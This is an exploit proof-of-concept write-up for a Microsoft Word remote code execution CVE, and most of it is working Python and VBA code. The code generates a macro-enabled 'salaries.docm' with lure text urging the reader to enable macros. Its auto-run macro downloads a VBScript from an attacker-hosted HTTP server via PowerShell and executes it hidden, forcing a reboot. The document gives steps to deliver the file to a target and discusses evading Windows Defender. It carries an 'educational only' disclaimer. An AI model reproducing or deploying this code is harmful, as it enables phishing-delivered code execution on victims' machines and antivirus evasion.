# CVE-2025-47170 Exploit PoC VBA Bypass Windows Defender
- Overview
This Python script is a proof-of-concept (PoC) exploit demonstrating the Microsoft Word Remote Code Execution vulnerability CVE-2025-47170.
It automates the creation of a malicious Microsoft Word .docm file with embedded VBA macros that download and execute a VBScript payload from an HTTP server. The VBScript payload forcibly reboots the victim machine.
Script Breakdown and Explanation
1. Imports and Dependencies
```python
import os
import sys
import socket
import http.server
import socketserver
import threading
import pythoncom
import win32com.client as win32
pythoncom and win32com.client (from pywin32) are used to automate Microsoft Word via COM.
http.server and socketserver create an HTTP server to host the payload files.
socket obtains the local IP address.
Standard libraries like os, sys, and threading for file management, arguments, and concurrency.
2. Get Local IP Address
```python
def get_local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
ip = "127.0.0.1"
finally:
s.close()
return IP
```
Creates a UDP socket to get the machine’s local IP address by "connecting" to a public DNS IP (Google's 8.8.8.8).
This IP is used to construct URLs to serve the payload.
3. Create VBScript Payload
```python
def create_vbs_payload(folder):
vbs_path = os.path.join(folder, "salaries.vbs")
vbs_content = '''
Set objShell = CreateObject("WScript.Shell")
objShell.Run "shutdown /r /t 5 /f", 0, False
'''
with open(vbs_path, "w") as f:
f.write(vbs_content.strip())
print(f"[*] Created VBS payload at: {vbs_path}")
return "salaries.vbs"
```
Writes a VBScript file salaries.vbs to the specified folder.
The script silently runs the Windows shutdown command to reboot the system after 5 seconds.
This VBScript is the payload executed by the macro.
4. Create Malicious Word Document (salaries.docm) with Embedded Macro
```python
def create_docm_with_macro(folder, payload_url):
docm_path = os.path.join(folder, "salaries.docm")
pythoncom.CoInitialize()
word = win32.gencache.EnsureDispatch('Word.Application')
word.Visible = False
doc = word.Documents.Add()
```
Initializes COM and launches Word invisibly.
Creates a new Word document.
```python
doc.Content.Text = "Please enable macros to see the salary details."
```
Adds some harmless text to trick the user into enabling macros.
```python
macro_code = f'''
Sub AutoOpen()
Call RunPayload
End Sub
Sub Document_Open()
Call RunPayload
End Sub
Sub RunPayload()
On Error Resume Next
Dim fullUrl As String
Dim payloadName As String
Dim fullPath As String
Dim shellCmd As String
Dim RetVal As Long
fullUrl = "http://" & "{payload_url}" & "/salaries.vbs"
payloadName = "salaries.vbs"
fullPath = Environ("TEMP") & "\\" & payloadName
shellCmd = "powershell -Command ""Invoke-WebRequest -Uri '" & fullUrl & "' -OutFile '" & fullPath & "' -UseBasicParsing"""
RetVal = Shell(shellCmd, vbHide)
RetVal = Shell("wscript.exe " & fullPath, vbHide)
End Sub
'''
```
VBA macro code that automatically executes on document open (AutoOpen, Document_Open).
It:
Builds the URL to download salaries.vbs.
Downloads the VBScript payload via PowerShell Invoke-WebRequest to the TEMP directory.
Executes the VBScript silently with wscript.exe.
Includes On Error Resume Next to avoid stopping on errors.
```python
vb_proj = doc.VBProject
vb_module = vb_proj.VBComponents.Add(1) # 1 = vbext_ct_StdModule
vb_module.CodeModule.AddFromString(macro_code.strip())
```
Injects the VBA macro into the Word document's VBA project.
```python
wdFormatXMLDocumentMacroEnabled = 13
try:
doc.SaveAs(docm_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
print(f"[*] Created malicious DOCM file: {docm_path}")
except Exception as e:
print(f"[!] Failed to save DOCM file: {e}")
finally:
doc.Close(False)
word.Quit()
pythoncom.CoUninitialize()
```
Saves the document as a .docm file (macro-enabled).
Properly closes Word and cleans up COM initialization.
5. Start HTTP Server to Host Payload and Document
```python
def start_http_server(folder, port):
os.chdir(folder)
handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", port), handler)
local_ip = get_local_ip()
print(f"[*] Serving HTTP at port {port} from folder: {folder}")
print(f"[*] Payload URL: http://{local_ip}:{port}/salaries.vbs")
print(f"[*] DOCM URL: http://{local_ip}:{port}/salaries.docm")
print("[*] Press Ctrl+C to stop the HTTP server and exit.")
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\n[*] Stopping HTTP server...")
httpd.server_close()
```
Changes directory to serve the current folder.
Starts a simple HTTP server on the specified port.
Outputs URLs for payload and document access.
Runs until interrupted.
6. Main Function: Workflow Control
```python
def main():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <port>")
sys.exit(1)
port = int(sys.argv[1])
folder = os.getcwd()
# Create payload.vbs if missing
vbs_path = os.path.join(folder, "salaries.vbs")
if not os.path.isfile(vbs_path):
create_vbs_payload(folder)
else:
print(f"[+] Using existing payload: {vbs_path}")
local_ip = get_local_ip()
payload_url = f"{local_ip}:{port}"
create_docm_with_macro(folder, payload_url)
start_http_server(folder, port)
```
Validates command-line argument (port).
Uses current directory as working folder.
Creates VBScript payload if it doesn't exist.
Generates malicious Word document with macro pointing to local HTTP server.
Starts HTTP server to serve files.
How to Use
Run the script with a port number argument:
```bash
python CVE-2025-47170.py 8000
```
The script will generate salaries.vbs and salaries.docm in the current directory.
It will start a HTTP server on port 8000 serving these files.
Deliver salaries.docm to the target user. When they open the document and enable macros:
The macro downloads salaries.vbs from http://<your-ip>:8000/salaries.vbs.
Runs the VBScript, which forces a system reboot.
Windows Defender Bypass Discussion
The VBScript payload is not embedded inside the Word document but downloaded dynamically.
The macro uses PowerShell’s Invoke-WebRequest to fetch the payload instead of suspicious commands like bitsadmin.
The macro uses basic VBA shell commands hidden from user interaction (vbHide).
This chaining of small steps makes it harder for signature-based antivirus to detect a full attack at once.
Note: This is a simple demonstration and modern Windows Defender versions with cloud heuristics or behavior detection may still block this.
Warnings and Legal Notice
For educational purposes only and authorized security testing.
Executing the VBScript payload will reboot your system without warning.
Ensure you have permission before testing on any machine.
Use in controlled environments only.
# nu11secur1ty
[Demo](https://www.youtube.com/watch?v=CliD216hNuY)
[Download the PoC:](https://minhaskamal.github.io/DownGit/#/home?url=https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47170)
